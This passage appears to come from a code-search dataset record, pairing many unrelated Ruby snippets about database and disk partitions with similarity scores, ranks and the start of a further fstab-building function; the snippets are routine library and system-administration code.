"def create_tables\n x = 1\n table_count = (all_guests.length / table_size_limit.to_f).ceil\n while x <= table_count\n Table.create(table_number: x, table_size_limit: table_size_limit, event_id: id)\n x += 1\n end\n end",
"def partition(partition_key)\n state_depth_must_be(States::RELATION)\n if @current_relation.partitions.include?(partition_key)\n raise \"duplicate partition key #{partition_key}\"\n end\n @current_relation.partitions << partition_key\n end",
"def table_elements(identifier)\n platform.tables_for(identifier.clone)\n end",
"def list_swap_partitions_with_type_and_size # nelsongs\n\treturn `fdisk -l | grep /dev | grep -v Disk | awk '{if ($2==\"*\" && $6==\"82\") print $1\":\"$5\":\"$6;else {if ($5==\"82\") print $1\":\"$4\":\"$5}}' | sed s/+//g`.chomp.split\nend",
"def partition_pattern(prefix, partitioned)\n pattern = case partitioned\n when :weekly\n Array.new(8, '_').join\n when :monthly\n Array.new(6, '_').join\n else\n raise \"Unrecognized option for 'partitioned': #{partitioned}\"\n end\n \"#{prefix}_#{pattern}\"\n end",
"def partition(predicate)\n each_operand(predicate) do |operand|\n case operand\n when Axiom::Function::Binary then partition_binary(operand)\n when Axiom::Function::Unary then partition_unary(operand)\n when Axiom::Attribute::Boolean then partition_attribute(operand)\n else\n partition_proposition(operand)\n end\n end\n end",
"def bootloader_partitions\n raise RuntimeError, \"Not implemented in base class\"\n end",
"def supports_list_partitions?\n postgresql_version >= 100_000\n end",
"def indexes_on(partitioned_table)\n return [] if Gem::Version.new(Rails.version) >= Gem::Version.new('6.0.3')\n return [] unless connection.supports_indexes_on_partitioned_tables?\n\n Indexes.new(connection).on(partitioned_table)\n end",
"def available_partitions\n partitions.select(&:available?)\n end",
"def problem_76\n return 100.partitions - 1\nend",
"def partition( header, &block )\n data.partition( header, &block ).map { |d| dup.load( d ) }\n end",
"def partition_and_process_non_tabular_lines\n non_tabular_lines.each do |line|\n if line =~ @start_line_pattern\n # This is a start line\n start_record(line)\n elsif line =~ @end_line_pattern\n # This is an end line\n end_record(line)\n else\n @non_tabular_record << line if @in_a_record\n end\n end\n end",
"def partition_check_device(devicename)\n if External.cmd(@server, \"/usr/bin/sudo /sbin/fdisk -l #{devicename}\").include? \"Disk #{devicename} doesn't contain a valid partition table\"\n false\n else\n true\n end\n end",
"def partition\n @articles.each do |article|\n minimum_bucket(article['read_time'].to_i) << article\n end\n end",
"def IsPartitionable(entry)\n entry = deep_copy(entry)\n Ops.get_symbol(entry, \"type\", :CT_UNKNOWN) == :CT_DMRAID ||\n Ops.get_symbol(entry, \"type\", :CT_UNKNOWN) == :CT_DMMULTIPATH ||\n Ops.get_symbol(entry, \"type\", :CT_UNKNOWN) == :CT_MDPART ||\n IsRealDisk(entry)\n end",
"def write(table,data,partition_key=nil)\n\n ## Get table schema...\n schema = get_table_schema(table)\n\n if schema == nil\n raise \"Scheme does not exist for table name ='#{table}'\"\n end\n\n ## Ensure that the keys in the passed data are symbols (this is what's expected)\n data.keys.each do |key|\n if(key.is_a?(Symbol) == false)\n raise \"Data key #{key} is not a symbol!\"\n # TODO: CONVERT string keys to symbols instead of raising\n end\n end\n\n intersection = schema[:columns].keys & data.keys\n\n ## Validate no data keys are passed that are not in table schema\n data.keys.each do |key|\n if(intersection.include?(key) == false)\n raise \"Data key #{key} is not in schema for #{table} table!!\"\n end\n end\n\n ## Validate that columns are not null\n schema[:columns].each do |column_name,column|\n if(column.keys.include?(:constraint) == true && column[:constraint] == \"not null\" && intersection.include?(column_name) == false)\n raise \"Column #{column_name} is missing from passed data\"\n end\n end\n\n ## Validate column types\n schema[:columns].each do |column_name,column|\n if(intersection.include?(column_name) == true)\n\n value = data[column_name.to_sym]\n column_type = column[:type]\n\n if column_type['('] != nil\n type_name = column_type[/(.*)\\(.*/,1]\n else\n type_name = column_type\n end\n\n type_name_downcased = type_name.downcase\n\n if @valid_data_types.include? type_name_downcased\n type_name_check_function = \"check_#{type_name_downcased.gsub(' ','_')}\".to_sym\n data[column_name.to_sym] = @data_types.send(type_name_check_function,value,column_type,column_name)\n else\n raise \"Invalid data type #{type_name}. Valid types [#{@valid_data_types.join(\",\")}]\"\n end\n end\n end\n\n ## Serialize as json, we load the data as JSON into redshift\n data_string=data.to_json\n\n ## Write the serialized data string to the broker\n partition_key = partition_key || rand(100).to_s\n stream_name = @broker.stream_name(table)\n result = @broker.stream_write(stream_name, data_string, partition_key)\n\n return result\n end",
"def query(statement, options = nil)\n query_partitions(Aerospike::PartitionFilter.all, statement, options)\n end",
"def partition(&block) # :nodoc:\n resolve\n result = @items.partition(&block)\n [\n self.class.new.import(result[0]),\n self.class.new.import(result[1]),\n ]\n end",
"def test_0260_partition\n @@log.debug \"test_0260_partition starts\" if @@log.debug?\n assert_respond_to(@list, :partition, \"test_0260_partition_respond\")\n # Basic partition\n ta = @list.partition {|obj| obj.ndata >= 3 }\n assert_equal(2, ta.size,\"test_0260_partition_basic_01\")\n # First array: block evaluated to true\n assert_equal([@aen, @bsb], ta[0], \"test_0260_partition_basic_02\")\n # Second array: block evaluated to false\n assert_equal([@cab, @dad], ta[1], \"test_0260_partition_basic_03\")\n # Check Enumerator or Enumerable::Enumerator return, no block given\n # This form not documented by the 1.8 Pickaxe.\n new_list = @list.partition\nif RUBY_VERSION >= \"1.9\"\n result = new_list.is_a? Enumerator\n assert(result, \"test_0260_partition_enumcheck\")\nelse\n # Note: the author's version of the 1.8 Pickaxe documents this\n # as an Array, however does not document this form of code at all.\n # YMMV.\n result = new_list.is_a? Enumerable::Enumerator\n assert(result, \"test_0260_partition_enumenumcheck\")\nend\n\n @@log.debug \"test_0260_partition ends\" if @@log.debug?\n end",
"def create_range_partition_of(parent_table_name, options)\n if (options[:range_start].nil? || options[:range_end].nil?) && options[:default].blank?\n raise ArgumentError, 'range_start and range_end or default must be defined'\n end\n\n Tablature.database.create_range_partition_of(parent_table_name, options)\n end",
"def FSCKPartition(partition)\n if !Mode.test\n detected_fs = Storage.DetectFs(partition)\n if detected_fs == :ext2\n # label, %1 is partition\n out = Builtins.sformat(_(\"Checking partition %1\"), partition)\n UI.OpenDialog(Opt(:decorated), Label(out))\n\n Builtins.y2milestone(\"command: /sbin/e2fsck -y %1\", partition)\n SCR.Execute(\n path(\".target.bash\"),\n Ops.add(\"/sbin/e2fsck -y \", partition)\n )\n\n UI.CloseDialog\n end\n end\n\n nil\n end",
"def setup\n @cypher_partition = CypherPartitioner.new\n end",
"def create\n begin\n # Set the partition (/dev/sdb1), device (/dev/sdb) and alignment (optimal,minimal,none etc.) variables\n partition= resource[:name]\n device=partition[0,(partition.length-1)]\n alignment= resource[:alignment]\n\n # Now we can create the partition\n partitions = parted('-a', resource[:alignment],'--script',device,'mklabel',resource[:part_label],'mkpart', resource[:part_type],resource[:fs_type],resource[:p_begin],resource[:p_end])\n rescue Puppet::ExecutionFailure => e\n false\n end\n end",
"def partition_devices(device_list, attempt = 0, max_attempts = 3)\n return false if attempt >= max_attempts\n\n puts case attempt\n when 0 then \"Partioning devices ...\" \n else \"Retrying device partitioning (attempt #{attempt + 1}) ...\" \n end\n\n device_list.each do |device|\n puts \" * #{device}\"\n `echo 0|sfdisk #{device}`\n end\n\n puts \"Sleeping 10 seconds to reload partition tables ...\"\n sleep 10\n\n # Verify all volumes were properly partitioned\n missing_devices = []\n device_list.each do |device|\n missing_devices << device unless File.exists?(\"#{device}1\")\n end\n\n # Retry partitioning for failed volumes\n response = true\n if missing_devices.size > 0\n response = partition_devices(missing_devices, attempt + 1, max_attempts)\n end\n response\n end",
"def supports_default_partitions?\n postgresql_version >= 110_000\n end",
"def delete_table_or_partition(table, dataset: nil)\n begin\n dataset ||= @dataset\n Embulk.logger.info { \"embulk-output-bigquery: Delete table... #{@destination_project}:#{dataset}.#{table}\" }\n with_network_retry { client.delete_table(@destination_project, dataset, table) }\n rescue Google::Apis::ServerError, Google::Apis::ClientError, Google::Apis::AuthorizationError => e\n if e.status_code == 404 && /Not found:/ =~ e.message\n # ignore 'Not Found' error\n return\n end\n\n response = {status_code: e.status_code, message: e.message, error_class: e.class}\n Embulk.logger.error {\n \"embulk-output-bigquery: delete_table(#{@destination_project}, #{dataset}, #{table}), response:#{response}\"\n }\n raise Error, \"failed to delete table #{@destination_project}:#{dataset}.#{table}, response:#{response}\"\n end\n end",
"def split(table_or_region_name, split_point = nil)\n split_point_bytes = nil\n split_point_bytes = split_point.to_java_bytes unless split_point.nil?\n begin\n if split_point_bytes.nil?\n org.apache.hadoop.hbase.util.FutureUtils.get(@admin.splitRegionAsync(table_or_region_name.to_java_bytes))\n else\n org.apache.hadoop.hbase.util.FutureUtils.get(@admin.splitRegionAsync(table_or_region_name.to_java_bytes, split_point_bytes))\n end\n rescue java.lang.IllegalArgumentException, org.apache.hadoop.hbase.UnknownRegionException\n if split_point_bytes.nil?\n @admin.split(TableName.valueOf(table_or_region_name))\n else\n @admin.split(TableName.valueOf(table_or_region_name), split_point_bytes)\n end\n end\n end",
"def shared_slice(hash_)\n offset_ = @offset\n select_set_ = {}\n hash_.each do |k_, v_|\n if (ainfo_ = @structure.axis(k_))\n aindex_ = ainfo_.axis_index\n unless select_set_.include?(aindex_)\n lindex_ = ainfo_.index(v_)\n if lindex_\n offset_ += ainfo_.step * lindex_\n select_set_[aindex_] = true\n end\n end\n end\n end\n Table.new(@structure.substructure_omitting(select_set_.keys),\n :acquire => @vals, :offset => offset_, :parent => self)\n end",
"def list_swap_partitions_with_size # nelsongs\n\treturn `fdisk -l | grep /dev | grep -v Disk | awk '{if ($2==\"*\" && $6==\"82\") print $1\":\"$5;else {if ($5==\"82\") print $1\":\"$4}}' | sed s/+//g`.chomp.split\nend",
"def partitions_for(topic=nil)\n if topic.class == String && block_given?\n @j_del.java_method(:partitionsFor, [Java::java.lang.String.java_class,Java::IoVertxCore::Handler.java_class]).call(topic,(Proc.new { |ar| yield(ar.failed ? ar.cause : nil, ar.succeeded ? ar.result.to_a.map { |elt| elt != nil ? JSON.parse(elt.toJson.encode) : nil } : nil) }))\n return self\n end\n raise ArgumentError, \"Invalid arguments when calling partitions_for(#{topic})\"\n end",
"def n_partitions\n return 4 if is_qlogic_57810?\n return 2 if is_qlogic_57840?\n return 2 if is_qlogic_57800? && port.between?(1, 2)\n\n 1\n end",
"def supports_hash_partitions?\n postgresql_version >= 110_000\n end",
"def compute_table_list\n if @configuration.download_tables\n # If the list is explicitly set then use that\n tables = @configuration.download_tables.to_set\n else\n # Otherwise guess via the tables actually in the database\n tables = @adapter.guess_tables.to_set\n\n if @configuration.allow_tables\n # Only allow tables tables that we specify\n tables = tables.intersection @configuration.allow_tables\n end\n if @configuration.disallow_tables\n # Remove any tables that we don't want included\n tables = tables.difference @configuration.disallow_tables\n end\n end\n return tables\n end",
"def add_partition_to_all_lowest( tp, nb_partitions_to_add )\n\n nodes_sizes_replicas = @nodes_lists_replicas.hmap { |k,v| { k => v.size } }\n nodes_lowest = nodes_sizes_replicas.sort_by{|k,v| v}.map { |a| a[0] }\n\n nodes_lowest.each do |node|\n break if nb_partitions_to_add <= 0\n\n unless @nodes_lists_replicas[node].has_key?(tp)\n add_partition_to_node( tp, node )\n nb_partitions_to_add -= 1\n end\n end\n end",
"def prepare_tables\n table_id = 0\n seen = {}\n\n sheets.each do |sheet|\n table_id += sheet.prepare_tables(table_id + 1, seen)\n end\n end",
"def create_download_session(table_name, partition = nil)\n if partition\n url = \"projects/#{ODPS.current_project}/tables/#{table_name}?partition=#{partition}&downloads\"\n else\n url = \"projects/#{ODPS.current_project}/tables/#{table_name}?downloads\"\n end\n res = ODPS.tunnel_conn.post do |req|\n req.url url\n req.headers['Content-Type'] = 'application/json'\n end\n JSON.parse res.body, {object_class: DownloadSession}\n end",
"def available_tables(sets_of_dishes, places_per_table)\n# dishes / seats\n return sets_of_dishes / places_per_table\nend",
"def from(value)\n using(partition: value)\n end",
"def roomer_set_table_name_prefix\n self.table_name_prefix = begin\n case @roomer_scope\n when :shared\n roomer_full_table_name_prefix(Roomer.shared_schema_name)\n when :tenanted\n roomer_full_table_name_prefix(Roomer.current_tenant.try(Roomer.tenant_schema_name_column))\n else\n \"\"\n end\n end\n end",
"def create(key_hash)\n # TODO: Raise if a key missing\n @model.transaction do\n partition = partition_class.create!(key_hash)\n @keys.create_partition_tables(@model, :key_hash => key_hash)\n # TODO: Indexes\n partition\n end\n end",
"def pdf_split(input, from, to, output)\n if from == to\n range = from\n else\n range = \"#{from}-#{to}\"\n end\n\n options = [\n input.shellescape,\n 'cat',\n range,\n 'output',\n output.shellescape\n ]\n `pdftk #{options.join(' ')}`\n end"
] |
[
"0.73846465",
"0.6675539",
"0.6539488",
"0.64836276",
"0.62881833",
"0.62800586",
"0.6146445",
"0.61269706",
"0.591312",
"0.58228123",
"0.5668915",
"0.5609678",
"0.5595541",
"0.5555945",
"0.551449",
"0.5510789",
"0.54816824",
"0.5454161",
"0.5439815",
"0.5434736",
"0.54189837",
"0.54128647",
"0.54043686",
"0.53812325",
"0.53622264",
"0.5323417",
"0.53059185",
"0.53015864",
"0.5296457",
"0.5295068",
"0.5281782",
"0.5251936",
"0.52349216",
"0.52312136",
"0.5177959",
"0.517098",
"0.5167387",
"0.5163342",
"0.515311",
"0.5134142",
"0.5130608",
"0.5090029",
"0.5083142",
"0.5075859",
"0.5072916",
"0.50681",
"0.50615853",
"0.50610703",
"0.5052428",
"0.5042386",
"0.5040075",
"0.50353855",
"0.5031691",
"0.5025889",
"0.5007001",
"0.4995957",
"0.49706742",
"0.49566785",
"0.49466935",
"0.49462467",
"0.49121296",
"0.49092722",
"0.49051452",
"0.48979992",
"0.4892523",
"0.4889925",
"0.48532698",
"0.48530328",
"0.48522872",
"0.48386073",
"0.4835996",
"0.48252448",
"0.4821992",
"0.48197308",
"0.48114815",
"0.4799706",
"0.47959927",
"0.47837287",
"0.47576353",
"0.4746385",
"0.47330135",
"0.4719982",
"0.47072312",
"0.47033805",
"0.46882743",
"0.46784094",
"0.46745926",
"0.4671777",
"0.46680787",
"0.46401706",
"0.46363577",
"0.4634225",
"0.4631247",
"0.46204904",
"0.46139807",
"0.46006274",
"0.46002066",
"0.4599468",
"0.45961404",
"0.45955232"
] |
0.64252746
|
4
|
Support partitions of tables using the :partition_of option.
|
def create_table?(name, options=OPTS, &block)
if options[:partition_of]
create_table(name, options.merge!(:if_not_exists=>true), &block)
return
end
super
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def partitioned_tables\n PartitionedTables.new(connection).all\n end",
"def create_partition_of_table_sql(name, generator, options)\n sql = create_table_prefix_sql(name, options).dup\n\n sql << \" PARTITION OF #{quote_schema_table(options[:partition_of])}\"\n\n case generator.partition_type\n when :range\n from, to = generator.range\n sql << \" FOR VALUES FROM #{literal(from)} TO #{literal(to)}\"\n when :list\n sql << \" FOR VALUES IN #{literal(generator.list)}\"\n when :hash\n mod, remainder = generator.hash_values\n sql << \" FOR VALUES WITH (MODULUS #{literal(mod)}, REMAINDER #{literal(remainder)})\"\n else # when :default\n sql << \" DEFAULT\"\n end\n\n sql << create_table_suffix_sql(name, options)\n\n sql\n end",
"def all\n partitions.group_by { |row| row['table_name'] }.map(&method(:to_tablature_table))\n end",
"def list_partitions(table_name, params = {})\n all_params = approved_tables.smash(table_name, params)\n validation.validate_parameters(all_params)\n partitions(all_params)\n end",
"def create_table(name, options=OPTS, &block)\n if options[:partition_of]\n create_partition_of_table_from_generator(name, CreatePartitionOfTableGenerator.new(&block), options)\n return\n end\n\n super\n end",
"def create_partitions\n info(\"Creating disk with #{PARTITION_TABLE_TYPE} parition table\")\n execute!(\"parted -s #{@dev} mklabel #{PARTITION_TABLE_TYPE}\")\n\n start_size = FIRST_PARTITION_OFFSET\n end_size = FIRST_PARTITION_OFFSET\n\n unspec_part = nil\n\n # Create the partitions\n @partition_layout.each_with_index do |part, index|\n # Deal with any \"open ended\" partitions last\n if not part.size_mb.is_a?(Integer)\n unspec_part = part\n next\n end\n\n start_size = end_size\n end_size += part.size_mb\n\n info(\"Creating partition #{part.label} (#{part.fs}, #{part.size_mb}MiB)\")\n execute!(\"parted #{@dev} mkpart #{part.label} #{part.fs} #{start_size}MiB #{end_size}MiB\")\n\n (part.flags || {}).each_pair { |k, v|\n info(\"Setting partition flag #{k} to #{v}\")\n execute!(\"parted #{@dev} set #{index + 1} #{k} #{v}\")\n }\n\n label_path = \"/dev/disk/by-partlabel/#{part.label}\"\n self.wait_for_device(label_path)\n\n if not part.fs\n warn(\"No filesystem specified for #{part.label}. Skipping FS\")\n else\n create_filesystem(part.fs, label_path, part.label)\n end\n\n if part.lvm\n notice(\"Setting up LVM on #{part.label}\")\n setup_lvm_on_partition(part)\n end\n end\n\n # Deal with any \"open ended\" partitions (that have an unspecified size_mb)\n if unspec_part\n part = unspec_part\n info(\"Creating partition #{part.label} (#{part.fs}, 100% remaining)\")\n execute!(\"parted #{@dev} mkpart #{part.label} #{part.fs} #{end_size}MiB 100%\")\n\n (part.flags || {}).each_pair { |k, v|\n info(\"Setting partition flag #{k} to #{v}\")\n execute!(\"parted #{@dev} set #{@partition_layout.length} #{k} #{v}\")\n }\n\n label_path = \"/dev/disk/by-partlabel/#{part.label}\"\n self.wait_for_device(label_path)\n create_filesystem(part.fs, label_path, part.label) if part.fs\n\n if part.lvm\n notice(\"Setting up LVM on #{part.label}\")\n setup_lvm_on_partition(part)\n end\n end\n\n nil\n end",
"def partition_type\n raise Error, \"Unable to determine partition type, multiple different partitioning methods called\" if [@from || @to, @list, @modulus || @remainder, @default].compact.length > 1\n\n if @from || @to\n raise Error, \"must call both from and to when creating a partition of a table if calling either\" unless @from && @to\n :range\n elsif @in\n :list\n elsif @modulus || @remainder\n raise Error, \"must call both modulus and remainder when creating a partition of a table if calling either\" unless @modulus && @remainder\n :hash\n elsif @default\n :default\n else\n raise Error, \"unable to determine partition type, no partitioning methods called\"\n end\n end",
"def partition_list()\nend",
"def partitions\n [6, 3, 0].map { |n| model.id / 10**n % 1000 }\n end",
"def partitions( partition_count, &proc )\n Enumerable.partition_sizes( self.size, partition_count ) do |partition|\n partitioned_collection = []\n consumed_so_far = 0\n partition.each do |partition_size|\n partitioned_collection << self[ consumed_so_far, partition_size ]\n consumed_so_far += partition_size\n end\n yield partitioned_collection\n end\n end",
"def partition_for!(key)\n if leader_available?\n # Use the configured partitioner\n partition_id = partitioner.call(key, available_partitions.count, partitions.count)\n partition!(partition_id)\n else\n error_code.raise\n end\n end",
"def table_name(*partition_key_values)\n return collect_first(*partition_key_values, &:table_name)\n end",
"def set_partition\n @partition = Partition.find(params[:id])\n end",
"def partition!(id)\n partition(id) || ErrorCode[:unknown_topic_or_partition].raise\n end",
"def partition_device\n Souffle::Log.info \"#{@node.log_prefix} Partitioning the device...\"\n provider.partition(@node)\n end",
"def supports_indexes_on_partitioned_tables?\n postgresql_version >= 110_000\n end",
"def create_partition_of_table_from_generator(name, generator, options)\n execute_ddl(create_partition_of_table_sql(name, generator, options))\n end",
"def create_partition device, partition_type = 'primary', start_unit, end_unit\n command = 'parted'\n params = \"#{device.path} -s -a optimal unit MB mkpart #{partition_type} ext3 #{start_unit} -- #{end_unit}\"\n parted = CommandsExecutor.new command, params\n parted.execute\n raise \"Command execution error: #{parted.stderr.read}\" if not parted.success?\n probe_kernal device\n end",
"def SetFormatPartitions(fstabpart)\n fstabpart = deep_copy(fstabpart)\n # All storage devices\n target_map = Storage.GetTargetMap\n\n # all activated\n tmp = Builtins.filter(RootPart.GetActivated) do |e|\n Ops.get_string(e, :type, \"\") == \"mount\" ||\n Ops.get_string(e, :type, \"\") == \"swap\"\n end\n\n Builtins.foreach(tmp) do |e|\n mntpt = Ops.get_string(e, :type, \"\") == \"swap\" ?\n \"swap\" :\n Ops.get_string(e, :mntpt, \"\")\n part = Ops.get_string(e, :device, \"\")\n p = {}\n Builtins.foreach(fstabpart) do |pp|\n # mountpoint matches\n if Ops.get_string(pp, \"mount\", \"\") == mntpt\n p = deep_copy(pp)\n raise Break\n end\n end\n mount_options = \"\"\n Builtins.foreach(Storage.ReadFstab(Installation.destdir)) do |entry|\n if Ops.get_string(entry, \"file\", \"\") == mntpt\n mount_options = Ops.get_string(entry, \"mntops\", \"\")\n raise Break\n end\n end\n target_map = Storage.SetPartitionData(target_map, part, \"mount\", mntpt)\n target_map = Storage.SetPartitionData(\n target_map,\n part,\n \"format\",\n Ops.get_boolean(p, \"format\", false)\n )\n target_map = Storage.SetPartitionData(target_map, part, \"delete\", false)\n target_map = Storage.SetPartitionData(target_map, part, \"create\", false)\n if Builtins.haskey(p, \"filesystem\")\n target_map = Storage.SetPartitionData(\n target_map,\n part,\n \"filesystem\",\n Ops.get_symbol(p, \"filesystem\", :ext4)\n )\n end\n if Ops.greater_than(Builtins.size(mount_options), 0) &&\n !Builtins.haskey(p, \"fstopt\")\n target_map = Storage.SetPartitionData(\n target_map,\n part,\n \"fstopt\",\n mount_options\n )\n end\n if Builtins.haskey(p, \"fstopt\")\n target_map = Storage.SetPartitionData(\n target_map,\n part,\n \"fstopt\",\n Ops.get_string(p, \"fstopt\", \"\")\n )\n end\n if Builtins.haskey(p, \"mountby\")\n target_map = Storage.SetPartitionData(\n target_map,\n part,\n \"mountby\",\n Ops.get_symbol(p, \"mountby\", :device)\n )\n end\n end\n\n Storage.SetTargetMap(target_map)\n true\n end",
"def create_range_partition(table_name, options, &block)\n raise ArgumentError, 'partition_key must be defined' if options[:partition_key].nil?\n\n Tablature.database.create_range_partition(table_name, options, &block)\n end",
"def addPartition(ptStr)\n pts_array = ptStr.split(',')\n sqlstr = \"ALTER TABLE \" + @mProjectName + \".\" + @mTableName\n sqlstr = sqlstr + \" ADD IF NOT EXISTS\" + \" PARTITION (\"\n pts_array.each { |pt|\n ptkv = pt.split('=')\n if ptkv.size != 2\n raise \"invalid partition spec\" + pt\n end\n sqlstr += ptkv[0] + '=' + \"'\" + ptkv[1] + \"'\" + ','\n }\n sqlstr = sqlstr[0..-2] + \");\"\n taskName = \"SQLAddPartitionTask\"\n runSQL(taskName, sqlstr)\n end",
"def partition(id)\n partitions.detect {|partition| partition.id == id}\n end",
"def make_partition_list(withall, flavor)\n part_list = []\n Builtins.foreach(RootPart.rootPartitions) do |partition, i|\n # see https://bugzilla.novell.com/attachment.cgi?id=96783&action=view\n\n # see bugzilla #288201\n # architecture needs to be valid when updating, not booting\n arch_is_valid = flavor == :boot ?\n true :\n Ops.get_boolean(i, :arch_valid, false)\n if withall || Ops.get_boolean(i, :valid, false) && arch_is_valid\n # `ext2, `jfs, ...\n part_fs = Ops.get_symbol(i, :fs)\n part_fs_name = Builtins.tostring(part_fs)\n if part_fs_name != nil &&\n Builtins.regexpmatch(part_fs_name, \"^`(.*)$\")\n part_fs_name = Builtins.regexpsub(part_fs_name, \"^`(.*)$\", \"\\\\1\")\n end\n\n system = Ops.get_string(i, :name, \"error\")\n # unknown system\n if system == \"unknown\"\n if part_fs != nil\n if CanBeLinuxRootFS(part_fs)\n # Table item (unknown system)\n system = _(\"Unknown Linux\")\n else\n # Table item (unknown system)\n system = _(\"Unknown or Non-Linux\")\n end\n else\n # Table item (unknown system [neither openSUSE 11.1 nor SLES 14 nor ...])\n system = _(\"Unknown\") if system == \"unknown\"\n end\n end\n\n arch = Ops.get_string(i, :arch, \"error\")\n # Table item (unknown architecture)\n arch = _(\"Unknown\") if arch == \"unknown\"\n\n # fist, use the name of file system (with short name for Linux)\n # then the file system short name\n # then \"Unknown\"\n fs = \"\"\n\n # is a linux fs, can be a root fs, has a fs name\n if part_fs != nil && Ops.get(i, :fstype) != nil &&\n CanBeLinuxRootFS(part_fs) &&\n part_fs_name != nil\n fs = Builtins.sformat(\n _(\"%1 (%2)\"),\n Ops.get_string(i, :fstype, \"\"),\n part_fs_name\n )\n else\n fs = Ops.get_string(i, :fstype, Ops.get_string(i, :fs, \"\"))\n end\n # Table item (unknown file system)\n fs = _(\"Unknown\") if fs == \"\"\n\n label = Ops.get_string(i, :label, \"\")\n\n part_list = Builtins.add(\n part_list,\n Item(Id(partition), system, partition, arch, fs, label)\n )\n end\n end\n deep_copy(part_list)\n end",
"def partition_used(partition)\n # Return magic number if in test_mode to prevent syscall\n return '128' if @test_mode\n b = ' ' * 128\n syscall(137, partition, b)\n a = b.unpack('QQQQQ')\n [a[2] * blocks_per_kilobyte, a[4] * blocks_per_kilobyte]\n end",
"def addPartition(ptStr)\n @mOdpsTable.addPartition(ptStr)\n end",
"def partitions\n topics.values.flat_map(&:partitions)\n end",
"def CreatePartition(disk, device, ptype, id, start, len, mby)\n Builtins.y2milestone(\n \"CreatePartition disk:%1 device:%2 ptype:%3 id:%4 start:%5 len:%6 mby:%7\",\n disk,\n device,\n ptype,\n id,\n start,\n len,\n mby\n )\n pt = fromSymbol(@conv_ptype, ptype)\n Builtins.y2milestone(\"CreatePartition type:%1 pt:%2\", ptype, pt)\n ret, cdev = @sint.createPartition(disk, pt, start, len)\n cdev = \"\" if ret<0\n if device != cdev\n Builtins.y2error(\"CreatePartition device:%1 cdev:%2\", device, cdev)\n end\n Builtins.y2error(\"CreatePartition ret %1\", ret) if ret<0\n ret = @sint.changePartitionId(device, id)\n Builtins.y2error(\"CreatePartition ret %1\", ret) if ret<0\n tmp = fromSymbol(@conv_mountby, mby)\n @sint.changeMountBy(device, tmp)\n Builtins.y2milestone(\"CreatePartition sint ret:%1\", ret)\n UpdateTargetMap()\n ret == 0\n end",
"def partition\n return enum_for(:partition) if not block_given?\n a,b = super\n [self.class.new(a), self.class.new(b)].freeze\n end",
"def create_partition(size = nil, type = Partition.PartitionType[:TYPE_PRIMARY])\n DiskUtils.create_partition self, size[:start_block], size[:end_block]\n partitions = Device.find(self).partitions\n return partitions.last\n end",
"def partition\n PredicatePartition.new(predicate, operand.left.header, operand.right.header)\n end",
"def add_partition_key(name, type)\n PartitionKey.new(name, type(type)).tap do |column|\n @partition_key_columns << add_column(column)\n end\n end",
"def GetPartitionList\n deep_copy(@partition_info)\n end",
"def create_list_partition_of(parent_table_name, options)\n if options[:values].blank? && options[:default].blank?\n raise ArgumentError, 'values or default must be defined'\n end\n\n Tablature.database.create_list_partition_of(parent_table_name, options)\n end",
"def partition_lookup\n return @partition_lookup unless @partition_lookup.nil?\n io = _root._io\n _pos = io.pos\n io.seek(_root.sector_size)\n @_raw_partition_lookup = io.read_bytes(sector_size)\n _io__raw_partition_lookup = Kaitai::Struct::Stream.new(@_raw_partition_lookup)\n @partition_lookup = PartitionEntry.new(_io__raw_partition_lookup, self, @_root)\n io.seek(_pos)\n @partition_lookup\n end",
"def dynamic_partition(data, partitions, num_partitions, name: nil)\n result = _op(:dynamic_partition, data, partitions, num_partitions: num_partitions, name: nil)\n num_partitions.times.map do |index|\n result[index]\n end\n end",
"def list_partitions_with_size_and_type # by nelsongs. => list: partition size type\n\treturn `fdisk -l | grep /dev | grep -v Disk | awk '{if ($2==\"*\") print $1\":\"$5\":\"$6;else print $1\":\"$4\":\"$5}' | sed s/+//g`.split\nend",
"def dump_partition_indexes(partitioned_table, stream)\n return unless Tablature.database.respond_to?(:indexes_on)\n\n indexes = Tablature.database.indexes_on(partitioned_table.name)\n return if indexes.empty?\n\n add_index_statements = indexes.map do |index|\n table_name = remove_prefix_and_suffix(index.table).inspect\n \" add_index #{([table_name] + index_parts(index)).join(', ')}\"\n end\n\n stream.puts add_index_statements.sort.join(\"\\n\")\n stream.puts\n end",
"def onepartition2fstab(part, other_nr)\n part = deep_copy(part)\n Builtins.y2milestone(\"onepartition2fstab part=%1\", part)\n if Ops.get_boolean(part, \"delete\", false) ||\n Ops.get_symbol(part, \"type\", :unknown) == :extended ||\n Builtins.contains(\n [:lvm, :sw_raid, :evms],\n Ops.get_symbol(part, \"type\", :unknown)\n ) &&\n Builtins.size(Ops.get_string(part, \"mount\", \"\")) == 0 ||\n Ops.get_symbol(part, \"enc_type\", :none) != :none &&\n !Ops.get_boolean(part, \"noauto\", false) ||\n !IsUsedBy(part) ||\n Builtins.contains(\n [\n Partitions.fsid_prep_chrp_boot,\n Partitions.fsid_lvm,\n Partitions.fsid_raid\n ],\n Ops.get_integer(part, \"fsid\", 0)\n ) &&\n Builtins.size(Ops.get_string(part, \"mount\", \"\")) == 0\n return {}\n end\n\n spec = Ops.get_string(part, \"device\", \"\")\n if Ops.get_symbol(part, \"mountby\", :device) == :label &&\n Ops.greater_than(Builtins.size(Ops.get_string(part, \"label\", \"\")), 0)\n spec = Builtins.sformat(\"LABEL=%1\", Ops.get_string(part, \"label\", \"\"))\n elsif Ops.get_symbol(part, \"mountby\", :device) == :uuid &&\n Ops.greater_than(Builtins.size(Ops.get_string(part, \"uuid\", \"\")), 0)\n spec = Builtins.sformat(\"UUID=%1\", Ops.get_string(part, \"uuid\", \"\"))\n end\n Builtins.y2debug(\"onepartition2fstab spec=%1\", spec)\n mount_point = Ops.get_string(part, \"mount\", \"\")\n fsid = Ops.get_integer(part, \"fsid\", 0)\n\n used_fs = Ops.get_symbol(part, \"used_fs\", :ext2)\n format = Ops.get_boolean(part, \"format\", false)\n\n vfstype = \"unknown\" # keep \"unknown\", used again below\n freq = 0\n passno = 0\n mntops = Ops.get_string(part, \"fstopt\", \"\")\n\n if mount_point == \"swap\"\n vfstype = \"swap\"\n if Builtins.isempty(mntops)\n mntops = Ops.get_string(\n FileSystems.GetFstabDefaultMap(\"swap\"),\n \"mntops\",\n \"\"\n )\n end\n passno = 0\n elsif fsid == Partitions.fsid_native || fsid == Partitions.fsid_lvm ||\n Ops.get_symbol(part, \"type\", :unknown) == :evms &&\n Ops.get_symbol(part, \"detected_fs\", :none) != :unknown\n vfstype = FileSystems.GetMountString(used_fs, format ? \"ext2\" : \"auto\")\n\n freq = 1\n if mount_point == 